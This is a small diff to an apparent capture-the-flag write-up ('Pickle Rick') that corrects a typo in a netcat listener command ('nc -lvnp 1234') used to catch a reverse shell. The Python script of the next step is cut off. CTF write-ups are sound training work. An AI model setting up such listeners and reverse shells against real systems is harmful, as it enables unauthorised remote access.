terminalpilot/terminalpilot.github.io/_posts/2021-01-20-PickleRick.md

 \
 1. A listener on our atttack machine
 \
-→ -nc -lvnp 1234 will accomplish this.
+→ nc -lvnp 1234 will accomplish this.
 \
 2. Run this python script:
 \